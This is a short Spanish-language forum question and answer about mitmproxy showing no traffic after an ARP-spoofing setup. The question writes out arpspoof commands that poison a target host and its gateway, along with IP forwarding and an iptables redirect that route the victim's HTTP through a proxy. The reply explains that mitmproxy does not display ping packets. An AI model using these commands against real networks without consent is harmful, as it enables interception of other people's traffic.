mitmproxy no muestra tráfico envenenado ARP

1

Tengo un equipo de destino en 10.0.0.14 y gateway en 10.0.0.1 . Me inserto con éxito como MITM ejecutando

sudo arpspoof -i wlp3s0 -t 10.0.0.1 10.0.0.14
sudo arpspoof -i wlp3s0 -t 10.0.0.14 10.0.0.1

Y cuando ejecuto arp en la máquina de destino, veo que 10.0.0.1 está asociado con mi MAC. En mi máquina, entonces corro

sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -i wlp3s0 -p tcp --dport 80 -j REDIRECT --to-port 8080

Finalmente, ejecuto ping google.com en la máquina de destino. Cuando ejecuto sudo tcpdump | grep 10.0.0.14 en mi máquina, veo muchos paquetes relacionados con las solicitudes de ping. Pero cuando ejecuto mitmproxy -T --host no obtengo nada! ¿Qué estoy haciendo mal?

P.S. Aquí está el resultado de ifconfig :

enp0s25   Link encap:Ethernet  HWaddr [redacted]
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Interrupt:20 Memory:f2500000-f2520000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:49445 errors:0 dropped:0 overruns:0 frame:0
          TX packets:49445 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:4511425 (4.5 MB)  TX bytes:4511425 (4.5 MB)

wlp3s0    Link encap:Ethernet  HWaddr [redacted]
          inet addr:10.0.0.6  Bcast:10.0.0.255  Mask:255.255.255.0
          inet6 addr: 2601:280:4900:e583:a64e:31ff:fe63:ccdc/64 Scope:Global
          inet6 addr: fe80::a64e:31ff:fe63:ccdc/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:502914 errors:0 dropped:0 overruns:0 frame:0
          TX packets:306905 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:489697020 (489.6 MB)  TX bytes:70008617 (70.0 MB)
    
pregunta Elliot Gorokhovsky 13.03.2016 - 23:35
fuente

1 respuesta

0

mitmproxy no mostrará ping s, solo mostrará el tráfico HTTP (o, con algunos ajustes, TCP).

    
respondido por el Maximilian Hils 15.03.2016 - 15:07
fuente

Lea otras preguntas en las etiquetas